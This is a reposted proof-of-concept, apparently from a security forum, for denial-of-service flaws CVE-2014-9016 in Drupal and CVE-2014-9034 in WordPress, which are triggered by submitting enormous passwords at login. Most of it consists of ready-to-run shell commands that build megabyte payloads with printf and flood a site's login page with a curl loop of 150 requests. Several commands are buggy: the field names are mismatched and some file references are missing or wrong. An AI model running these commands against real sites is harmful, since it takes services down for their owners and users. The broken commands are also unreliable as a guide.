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CVE-2014-9016 and CVE-2014-9034 Drupal & Wordpress Denial of Service

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Drupal Denial of Service CVE-2014-9016

Generate a pyaload and try with a non-valid user:

$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload

$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Generate a pyaload and try with a valid user:

$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &

Perform a Dos with a valid user:

$ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done

Wordpress Denial of Service CVE-2014-9034

Generate a pyaload and try with a non-valid user:

$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload

$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Generate a pyaload and try with a valid user:

$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

$ time curl --data valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &

Perform a Dos with a valid user:

$ for i in `seq 1 150`; do (curl --data valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done

Python Code



Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep

Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep

Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console




NVD - Detail

NVD - Detail

Source : CVE-2014-9016 and CVE-2014-9034 Proof of Concept ~ Hacking while you're asleep

Edited by devilox
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